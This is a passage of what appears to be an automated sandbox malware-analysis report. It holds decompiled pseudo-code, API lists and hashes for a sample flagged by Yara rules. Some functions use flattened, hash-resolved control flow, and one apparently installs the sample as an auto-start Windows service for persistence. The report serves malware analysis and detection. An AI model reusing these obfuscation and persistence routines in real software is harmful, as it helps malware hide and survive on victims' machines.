                                            												return E02238BA0(_t327, _t391);
                                            											} else {
                                            												__eflags = _t191 - 0x27047861;
                                            												if(_t191 == 0x27047861) {
                                            													_t209 = E02237160(_t300);
                                            													__eflags = _t209;
                                            													if(_t209 == 0) {
                                            														goto L142;
                                            													} else {
                                            														_t191 = 0x226f6c18;
                                            														continue;
                                            													}
                                            												} else {
                                            													__eflags = _t191 - 0x27dc0a4c;
                                            													if(_t191 != 0x27dc0a4c) {
                                            														break;
                                            													} else {
                                            														_v32 = E02235EA0();
                                            														_t191 = 0xd28318f;
                                            														continue;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										if(__eflags == 0) {
                                            											_t249 = E02239320(_t391);
                                            											asm("sbb eax, eax");
                                            											_t191 = ( ~_t249 & 0x1c98683e) + 0xe0d6cd8;
                                            											continue;
                                            										} else {
                                            											__eflags = _t191 - 0x226f6c18;
                                            											if(__eflags > 0) {
                                            												__eflags = _t191 - 0x2537e9de;
                                            												if(_t191 != 0x2537e9de) {
                                            													break;
                                            												} else {
                                            													__eflags = _t371 | _t300;
                                            													if((_t371 | _t300) == 0) {
                                            														L81:
                                            														_t191 = _t391;
                                            														break;
                                            													} else {
                                            														_v128 = 0x1f9e;
                                            														_v128 = _v128 >> 0xc;
                                            														_v128 = _v128 + 0xffff30c3;
                                            														_v128 = _v128 ^ 0xffff3064;
                                            														_t254 = E02235CD0();
                                            														__eflags = _t254 - _v128;
                                            														if(_t254 <= _v128) {
                                            															_t347 = 0;
                                            															__eflags = 0;
                                            														} else {
                                            															_t258 = E02234190(_t300, 0xbb398380, 0xae3c1a47, _t391, 0xb3);
                                            															_t398 = _t398 + 4;
                                            															_t259 =  *_t258();
                                            															_t260 = E02235CD0();
                                            															_t347 = _t259 % (_t260 - E02235D00());
                                            															_t375 = 0x2564be4f;
                                            														}
                                            														_v128 = 0x1f9e;
                                            														_v128 = _v128 >> 0xc;
                                            														_v128 = _v128 + 0xffff30c3;
                                            														_v128 = _v128 ^ 0xffff3064;
                                            														_t327 = _v128 + _t347;
                                            														_t255 = E02239EA0(_t300, _v128 + _t347);
                                            														__eflags = _t255;
                                            														if(_t255 == 0) {
                                            															_t347 = 0xcfd93ac1;
                                            															_t327 = 0xbb398380;
                                            															_t256 = E02234190(_t300, 0xbb398380, 0xcfd93ac1, _t391, 0xcf);
                                            															_t398 = _t398 + 4;
                                            															_t257 =  *_t256();
                                            															__eflags = 0xcfd93ac1 - _t300;
                                            															if(__eflags < 0) {
                                            																goto L27;
                                            															} else {
                                            																if(__eflags > 0) {
                                            																	goto L81;
                                            																} else {
                                            																	__eflags = _t257 - _t371;
                                            																	if(_t257 < _t371) {
                                            																		goto L27;
                                            																	} else {
                                            																		goto L81;
                                            																	}
                                            																}
                                            															}
                                            														} else {
                                            															goto L77;
                                            														}
                                            													}
                                            												}
                                            											} else {
                                            												if(__eflags == 0) {
                                            													E02236FB0(_t300);
                                            													_t191 = 0xf0c159c;
                                            													continue;
                                            												} else {
                                            													__eflags = _t191 - 0x216a974b;
                                            													if(_t191 == 0x216a974b) {
                                            														_v36 = E022347A0(_t300, _t391);
                                            														_t191 = 0x27dc0a4c;
                                            														continue;
                                            													} else {
                                            														__eflags = _t191 - 0x21c0adc4;
                                            														if(_t191 != 0x21c0adc4) {
                                            															break;
                                            														} else {
                                            															E022387D0();
                                            															_t191 = 0x14860a92;
                                            															continue;
                                            														}
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							goto L143;
                                            						}
                                            						__eflags = _t191 - 0x33f417f9;
                                            					} while (_t191 != 0x33f417f9);
                                            					return _t191;
                                            					goto L143;
                                            				}
                                            			}













































































                                            0x022369d1
                                            0x022369d8
                                            0x022369df
                                            0x00000000
                                            0x0223689a
                                            0x0223689a
                                            0x0223689f
                                            0x022368e6
                                            0x022368eb
                                            0x00000000
                                            0x022368f1
                                            0x022368f3
                                            0x022368f5
                                            0x022369bc
                                            0x022369bc
                                            0x00000000
                                            0x022368fb
                                            0x022368fb
                                            0x02236903
                                            0x02236908
                                            0x02236910
                                            0x02236918
                                            0x0223691d
                                            0x02236921
                                            0x02236959
                                            0x02236959
                                            0x02236923
                                            0x02236932
                                            0x02236937
                                            0x0223693a
                                            0x0223693e
                                            0x02236950
                                            0x02236952
                                            0x02236952
                                            0x0223695b
                                            0x02236963
                                            0x02236968
                                            0x02236970
                                            0x0223697c
                                            0x0223697e
                                            0x02236983
                                            0x02236985
                                            0x02236996
                                            0x0223699b
                                            0x022369a0
                                            0x022369a5
                                            0x022369a8
                                            0x022369aa
                                            0x022369ac
                                            0x00000000
                                            0x022369b2
                                            0x022369b2
                                            0x00000000
                                            0x022369b4
                                            0x022369b4
                                            0x022369b6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x022369b6
                                            0x022369b2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x02236985
                                            0x022368f5
                                            0x022368a1
                                            0x022368a1
                                            0x022368d7
                                            0x022368dc
                                            0x00000000
                                            0x022368a3
                                            0x022368a3
                                            0x022368a8
                                            0x022368c9
                                            0x022368cd
                                            0x00000000
                                            0x022368aa
                                            0x022368aa
                                            0x022368af
                                            0x00000000
                                            0x022368b5
                                            0x022368b5
                                            0x022368ba
                                            0x00000000
                                            0x022368ba
                                            0x022368af
                                            0x022368a8
                                            0x022368a1
                                            0x0223689f
                                            0x02236894
                                            0x0223688e
                                            0x02236883
                                            0x00000000
                                            0x0223687d
                                            0x022369be
                                            0x022369be
                                            0x022369d0
                                            0x00000000
                                            0x022369d0

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: W$$ke@5$ke@5$l!`u
                                            • API String ID: 0-26469448
                                            • Opcode ID: 68b839dee1391adc3a5651a3e9bf83e38ca0efdee584fddf5ff4e1906d07817f
                                            • Instruction ID: f6226fc0b5ee2ce1eb51733b5606b426540b3c95d9df7e917a383f906cb72a6e
                                            • Opcode Fuzzy Hash: 68b839dee1391adc3a5651a3e9bf83e38ca0efdee584fddf5ff4e1906d07817f
                                            • Instruction Fuzzy Hash: EC22E4F26343029BC72AEEE8954413E76EEAB80744F54082EF585D7258EB70CD49CB97
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E00406204(intOrPtr* _a4) {
                                            				struct _SYSTEMTIME _v20;
                                            				struct _SYSTEMTIME _v36;
                                            				short _v54;
                                            				struct _TIME_ZONE_INFORMATION _v208;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t23;
                                            				signed int _t24;
                                            				intOrPtr _t31;
                                            				intOrPtr* _t36;
                                            				void* _t37;
                                            				void* _t39;
                                            				void* _t43;
                                            				void* _t44;
                                            				void* _t45;
                                            				void* _t46;
                                            				void* _t47;
                                            
                                            				GetLocalTime( &_v20);
                                            				GetSystemTime( &_v36);
                                            				_t43 = _v36.wMinute -  *0x439ce2; // 0x0
                                            				if(_t43 != 0) {
                                            					L6:
                                            					_t23 = GetTimeZoneInformation( &_v208);
                                            					if(_t23 == 0xffffffff) {
                                            						_t24 = _t23 | 0xffffffff;
                                            					} else {
                                            						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
                                            							_t24 = 0;
                                            						} else {
                                            							_t24 = 1;
                                            						}
                                            					}
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t37 = _t37;
                                            					 *0x439cd0 = _t24;
                                            					_t39 = _t39;
                                            					L14:
                                            					_t31 = E00408F71(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
                                            					_t36 = _a4;
                                            					if(_t36 == 0) {
                                            						return _t31;
                                            					}
                                            					 *_t36 = _t31;
                                            					return _t31;
                                            				}
                                            				_t44 = _v36.wHour -  *0x439ce0; // 0x0
                                            				if(_t44 != 0) {
                                            					goto L6;
                                            				}
                                            				_t45 = _v36.wDay -  *0x439cde; // 0x0
                                            				if(_t45 != 0) {
                                            					goto L6;
                                            				}
                                            				_t46 = _v36.wMonth -  *0x439cda; // 0x0
                                            				if(_t46 != 0) {
                                            					goto L6;
                                            				}
                                            				_t47 = _v36.wYear -  *0x439cd8; // 0x0
                                            				if(_t47 != 0) {
                                            					goto L6;
                                            				}
                                            				_t24 =  *0x439cd0; // 0x0
                                            				goto L14;
                                            			}





















                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 00406211
                                            • GetSystemTime.KERNEL32(?), ref: 0040621B
                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00406270
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Time$InformationLocalSystemZone
                                            • String ID:
                                            • API String ID: 2475273158-0
                                            • Opcode ID: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
                                            • Instruction ID: 3f1c4332e89f5b2d1d6816171f69ac3eb852245dda195b9ef9698e6a055d0bd8
                                            • Opcode Fuzzy Hash: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
                                            • Instruction Fuzzy Hash: 1B214F2990001AE5CB20AFD9E8045FE73B8BB05710F45116AF812A61D0E7785DD2D77C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E00404F00(struct HWND__* _a4, signed int _a8) {
                                            				struct _WINDOWPLACEMENT _v48;
                                            				int _t16;
                                            
                                            				if(E00404DD2() == 0) {
                                            					if((_a8 & 0x00000003) == 0) {
                                            						if(IsIconic(_a4) == 0) {
                                            							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                            						} else {
                                            							_t16 = GetWindowPlacement(_a4,  &_v48);
                                            						}
                                            						if(_t16 == 0) {
                                            							return 0;
                                            						} else {
                                            							return E00404EAA( &(_v48.rcNormalPosition), _a8);
                                            						}
                                            					}
                                            					return 0x12340042;
                                            				}
                                            				return  *0x43960c(_a4, _a8);
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
                                            • Instruction ID: b4a2923728d38d9147ff113c7bedcff831c7b24fed2f7eef246683424e6392e6
                                            • Opcode Fuzzy Hash: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
                                            • Instruction Fuzzy Hash: 1DF031B150410ABACF01AF71DC449AE7BA8AF84344B448032FA15E51A1DB38DA12DB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004198B0(void* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _t7;
                                            				void* _t14;
                                            				void* _t16;
                                            				struct HWND__** _t20;
                                            
                                            				_t21 = __ebp;
                                            				_t7 = _a4;
                                            				_t20 = _t7 + 0x1c;
                                            				_t16 = E00413740(__ebp, GetParent( *(_t7 + 0x1c)));
                                            				if(E00416753(_t16, 0x42cc08) == 0) {
                                            					L4:
                                            					return 0;
                                            				}
                                            				if(_a8 != 0) {
                                            					L5:
                                            					return _t16;
                                            				} else {
                                            					goto L2;
                                            				}
                                            				while(1) {
                                            					L2:
                                            					_t14 = E00413740(_t21, GetParent( *_t20));
                                            					if(_t14 == 0) {
                                            						goto L5;
                                            					}
                                            					_t6 = _t14 + 0x1c; // 0x1c
                                            					_t20 = _t6;
                                            					if(IsIconic( *(_t14 + 0x1c)) == 0) {
                                            						continue;
                                            					}
                                            					goto L4;
                                            				}
                                            				goto L5;
                                            			}








                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Parent$Iconic
                                            • String ID:
                                            • API String ID: 344791563-0
                                            • Opcode ID: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
                                            • Instruction ID: 95d136e54c1882d44521d8e3266ce7aea084792c8d1a411097e8097360147bcb
                                            • Opcode Fuzzy Hash: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
                                            • Instruction Fuzzy Hash: 7AF0B4B1320205BEDB206F22DC54E9B775CEF80795B15843AF511D7261D738DC86C764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00412ABD(intOrPtr _a4) {
                                            				intOrPtr _t6;
                                            				void* _t13;
                                            
                                            				_t6 = _a4;
                                            				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                            					return 0;
                                            				} else {
                                            					_t13 = 1;
                                            					return _t13;
                                            				}
                                            			}






                                            APIs
                                            • GetKeyState.USER32(00000010), ref: 00412AE4
                                            • GetKeyState.USER32(00000011), ref: 00412AED
                                            • GetKeyState.USER32(00000012), ref: 00412AF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: State
                                            • String ID:
                                            • API String ID: 1649606143-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E022387D0() {
                                            				char _v520;
                                            				void* _v524;
                                            				intOrPtr _v576;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t11;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t16;
                                            				intOrPtr* _t21;
                                            				void* _t24;
                                            				intOrPtr* _t32;
                                            				void* _t35;
                                            				intOrPtr _t40;
                                            				intOrPtr* _t53;
                                            				intOrPtr _t58;
                                            				void* _t59;
                                            				intOrPtr _t60;
                                            				short* _t62;
                                            				short** _t63;
                                            				void* _t64;
                                            				void* _t66;
                                            				void* _t67;
                                            
                                            				_t64 =  &_v524;
                                            				_t58 = 0;
                                            				_t11 = 0x388705c7;
                                            				_v524 = 0;
                                            				_t63 = _v524;
                                            				_t35 = _v524;
                                            				_t60 = _v524;
                                            				while(1) {
                                            					_t66 = _t11 - 0x2793b377;
                                            					if(_t66 > 0) {
                                            						goto L21;
                                            					}
                                            					L2:
                                            					if(_t66 == 0) {
                                            						E02235070(_t35, _t63);
                                            						_t11 = 0x93584cb;
                                            						continue;
                                            					} else {
                                            						_t67 = _t11 - 0x124353fe;
                                            						if(_t67 > 0) {
                                            							if(_t11 == 0x2169f629) {
                                            								_t21 =  *0x223ddb8;
                                            								if(_t21 == 0) {
                                            									_t21 = E02233E80(_t35, E02233F20(0x667fdee), 0x505cb3fe, _t63);
                                            									 *0x223ddb8 = _t21;
                                            								}
                                            								 *_t21(_t35);
                                            								L36:
                                            								return _t58;
                                            							} else {
                                            								goto L18;
                                            							}
                                            						} else {
                                            							if(_t67 == 0) {
                                            								_t24 = E022334C0(0x223d8f0);
                                            								_t53 =  *0x223dc60;
                                            								_t59 = _t24;
                                            								if(_t53 == 0) {
                                            									_t53 = E02233E80(_t35, E02233F20(0xe66945e6), 0xcca28b0d, _t63);
                                            									 *0x223dc60 = _t53;
                                            								}
                                            								_t40 =  *0x223e2ec;
                                            								 *_t53( &_v520, 0x104, _t59, _t40 + 0x5c, _t40 + 0x278);
                                            								_t64 = _t64 + 0x14;
                                            								E02233460(_t59);
                                            								_t58 = _v524;
                                            								_t11 = 0x3acbd78;
                                            								continue;
                                            							} else {
                                            								if(_t11 == 0x3acbd78) {
                                            									_t62 =  *0x223e2ec + 0x278;
                                            									while( *_t62 != 0x5c) {
                                            										_t62 = _t62 + 2;
                                            									}
                                            									_t60 = _t62 + 2;
                                            									_t11 = 0x2d3078b2;
                                            									continue;
                                            								} else {
                                            									if(_t11 == 0x93584cb) {
                                            										_t32 =  *0x223ddb8;
                                            										if(_t32 == 0) {
                                            											_t32 = E02233E80(_t35, E02233F20(0x667fdee), 0x505cb3fe, _t63);
                                            											 *0x223ddb8 = _t32;
                                            										}
                                            										 *_t32(_t63);
                                            										L10:
                                            										_t11 = 0x2169f629;
                                            										continue;
                                            										do {
                                            											while(1) {
                                            												_t66 = _t11 - 0x2793b377;
                                            												if(_t66 > 0) {
                                            													goto L21;
                                            												}
                                            												goto L2;
                                            											}
                                            											goto L21;
                                            										} while (_t11 != 0x33cd76b6);
                                            										return _t58;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					L37:
                                            					L21:
                                            					if(_t11 == 0x2d3078b2) {
                                            						_t12 =  *0x223e0f4;
                                            						if(_t12 == 0) {
                                            							_t12 = E02233E80(_t35, E02233F20(0x667fdee), 0x7f692adf, _t63);
                                            							 *0x223e0f4 = _t12;
                                            						}
                                            						_t35 =  *_t12(0, 0, 0xf003f);
                                            						if(_t35 == 0) {
                                            							goto L36;
                                            						} else {
                                            							_t11 = 0x34ee6736;
                                            							continue;
                                            						}
                                            					} else {
                                            						if(_t11 == 0x34ee6736) {
                                            							_t16 =  *0x223db50;
                                            							if(_t16 == 0) {
                                            								_t16 = E02233E80(_t35, E02233F20(0x667fdee), 0xc2730d45, _t63);
                                            								 *0x223db50 = _t16;
                                            							}
                                            							_t63 =  *_t16(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
                                            							if(_t63 == 0) {
                                            								goto L10;
                                            							} else {
                                            								_t58 = 1;
                                            								_t11 = 0x2793b377;
                                            								_v576 = 1;
                                            							}
                                            							continue;
                                            						} else {
                                            							if(_t11 != 0x388705c7) {
                                            								goto L18;
                                            							} else {
                                            								_t11 = 0x124353fe;
                                            								continue;
                                            							}
                                            						}
                                            					}
                                            					goto L37;
                                            				}
                                            			}

























                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 6g4$6g4$Ei
                                            • API String ID: 0-2833161213
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E004145CA(intOrPtr* __ecx) {
                                            				signed int _t137;
                                            				signed int _t140;
                                            				signed int _t141;
                                            				signed int _t145;
                                            				signed int _t147;
                                            				signed int _t148;
                                            				intOrPtr _t150;
                                            				signed int _t151;
                                            				signed int* _t152;
                                            				signed char _t155;
                                            				unsigned int _t159;
                                            				unsigned int _t167;
                                            				void* _t168;
                                            				signed int _t172;
                                            				signed int* _t176;
                                            				unsigned int _t178;
                                            				intOrPtr* _t179;
                                            				unsigned int _t180;
                                            				intOrPtr* _t181;
                                            				signed int _t186;
                                            				unsigned int _t191;
                                            				unsigned int _t203;
                                            				void* _t205;
                                            
                                            				_t182 = __ecx;
                                            				E00406520(E00429E60, _t205);
                                            				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
                                            				_t172 =  *(_t205 + 8);
                                            				_t200 = __ecx;
                                            				if(_t172 != 0x111) {
                                            					if(_t172 != 0x4e) {
                                            						_t203 =  *(_t205 + 0x10);
                                            						if(_t172 == 6) {
                                            							E004134A8(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E00413740(_t205, _t203));
                                            						}
                                            						if(_t172 != 0x20 || E00413509(_t200, _t203, _t203 >> 0x10) == 0) {
                                            							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
                                            							 *(_t205 - 0x14) = _t137;
                                            							E00425F56(7);
                                            							_t186 =  *(_t205 + 8);
                                            							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
                                            							_t176 = 0x437ce0 + _t140 * 4;
                                            							_t141 =  *(_t205 - 0x14);
                                            							if(_t186 !=  *(0x437ce0 + _t140 * 4) || _t141 != _t176[2]) {
                                            								 *_t176 = _t186;
                                            								_t176[2] = _t141;
                                            								if(_t141 == 0) {
                                            									L29:
                                            									_t176[1] = _t176[1] & 0x00000000;
                                            									E00425FC6(7);
                                            									goto L30;
                                            								}
                                            								L20:
                                            								while(1) {
                                            									if(_t186 >= 0xc000) {
                                            										_t145 = E00414546( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
                                            										 *(_t205 + 0x10) = _t145;
                                            										if(_t145 == 0) {
                                            											L28:
                                            											_t147 =  *( *(_t205 - 0x14));
                                            											 *(_t205 - 0x14) = _t147;
                                            											if(_t147 != 0) {
                                            												_t141 =  *(_t205 - 0x14);
                                            												_t186 =  *(_t205 + 8);
                                            												continue;
                                            											}
                                            											goto L29;
                                            										}
                                            										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
                                            											_t159 = E00414546(_t145 + 0x18, 0xc000, 0, 0);
                                            											 *(_t205 + 0x10) = _t159;
                                            											if(_t159 != 0) {
                                            												_t145 =  *(_t205 + 0x10);
                                            												continue;
                                            											}
                                            											goto L28;
                                            										}
                                            										_t176[1] = _t145;
                                            										E00425FC6(7);
                                            										_t180 =  *(_t205 + 0x10);
                                            										goto L96;
                                            									}
                                            									_t148 = E00414546( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
                                            									 *(_t205 + 0x10) = _t148;
                                            									if(_t148 != 0) {
                                            										_t176[1] = _t148;
                                            										E00425FC6(7);
                                            										_t178 =  *(_t205 + 0x10);
                                            										goto L33;
                                            									}
                                            									goto L28;
                                            								}
                                            							} else {
                                            								_t178 = _t176[1];
                                            								 *(_t205 + 0x10) = _t178;
                                            								E00425FC6(7);
                                            								if(_t178 == 0) {
                                            									L30:
                                            									goto L31;
                                            								}
                                            								if( *(_t205 + 8) < 0xc000) {
                                            									L33:
                                            									_t191 =  *(_t205 + 0x10);
                                            									_t179 =  *((intOrPtr*)(_t178 + 0x14));
                                            									_t150 =  *((intOrPtr*)(_t191 + 0x10));
                                            									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
                                            										_t155 = GetVersion();
                                            										asm("sbb eax, eax");
                                            										_t150 = (_t155 & 0x000000f0) + 0x2f;
                                            									}
                                            									_t151 = _t150 - 1;
                                            									if(_t151 > 0x30) {
                                            										goto L100;
                                            									} else {
                                            										switch( *((intOrPtr*)(_t151 * 4 +  &M00414A78))) {
                                            											case 0:
                                            												_push( *((intOrPtr*)(_t205 + 0xc)));
                                            												_push(E00419BA2());
                                            												goto L52;
                                            											case 1:
                                            												_push( *(__ebp + 0xc));
                                            												goto L52;
                                            											case 2:
                                            												_push(__esi >> 0x10);
                                            												__eax = __si;
                                            												_push(__si);
                                            												__eax = E00413740(__ebp,  *(__ebp + 0xc));
                                            												goto L55;
                                            											case 3:
                                            												__ecx = __ebp - 0x24;
                                            												E00419B00(__ebp - 0x24) =  *(__esi + 4);
                                            												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                            												__ecx = __ebp - 0x60;
                                            												 *(__ebp - 0x20) =  *(__esi + 4);
                                            												__eax = E0041331F(__ebp - 0x60);
                                            												__eax =  *__esi;
                                            												__esi =  *(__esi + 8);
                                            												_push(__eax);
                                            												 *(__ebp - 4) = 1;
                                            												 *(__ebp - 0x44) = __eax;
                                            												__eax = E00413767();
                                            												if(__eax == 0) {
                                            													__eax =  *(__edi + 0x34);
                                            													if(__eax != 0) {
                                            														__ecx = __eax + 0x20;
                                            														__eax = E00411824(__eax + 0x20,  *(__ebp - 0x44));
                                            														if(__eax != 0) {
                                            															 *(__ebp - 0x28) = __eax;
                                            														}
                                            													}
                                            													__eax = __ebp - 0x60;
                                            												}
                                            												_push(__esi);
                                            												_push(__eax);
                                            												__eax = __ebp - 0x24;
                                            												__ecx = __edi;
                                            												_push(__ebp - 0x24);
                                            												__eax =  *__ebx();
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                                            												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
                                            												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                            												__ecx = __ebp - 0x60;
                                            												 *(__ebp - 0x10) = __ebp - 0x24;
                                            												__eax = E00413DB2(__ebp - 0x60);
                                            												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                                            												__ecx = __ebp - 0x24;
                                            												goto L48;
                                            											case 4:
                                            												__ecx = __ebp - 0x24;
                                            												E00419B00(__ebp - 0x24) =  *(__esi + 4);
                                            												_push( *(__esi + 8));
                                            												 *(__ebp - 0x20) =  *(__esi + 4);
                                            												__eax = __ebp - 0x24;
                                            												_push(__ebp - 0x24);
                                            												__ecx = __edi;
                                            												 *(__ebp - 4) = 2;
                                            												__eax =  *__ebx();
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                                            												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                                            												 *(__ebp - 0x10) = __ebp - 0x24;
                                            												__ecx = __ebp - 0x24;
                                            												L48:
                                            												__eax = E00419C1F(__ecx);
                                            												goto L100;
                                            											case 5:
                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                            												_push( *(__ebp + 0xc) >> 0x10);
                                            												__eax = E00413740(__ebp, __esi);
                                            												goto L54;
                                            											case 6:
                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                            												_push( *(__ebp + 0xc) >> 0x10);
                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                            												goto L83;
                                            											case 7:
                                            												_push(__esi);
                                            												L52:
                                            												_t154 =  *_t179();
                                            												goto L99;
                                            											case 8:
                                            												L97:
                                            												_push(_t203);
                                            												_push( *((intOrPtr*)(_t205 + 0xc)));
                                            												goto L98;
                                            											case 9:
                                            												_push(__esi);
                                            												_push(E00417635());
                                            												__eax =  *(__ebp + 0xc);
                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                            												L54:
                                            												_push(__eax);
                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                            												L55:
                                            												_push(__eax);
                                            												__ecx = __edi;
                                            												__eax =  *__ebx();
                                            												goto L99;
                                            											case 0xa:
                                            												__ecx = __edi;
                                            												__eax =  *__ebx();
                                            												goto L100;
                                            											case 0xb:
                                            												_push( *(__ebp + 0xc));
                                            												goto L86;
                                            											case 0xc:
                                            												_push(__esi);
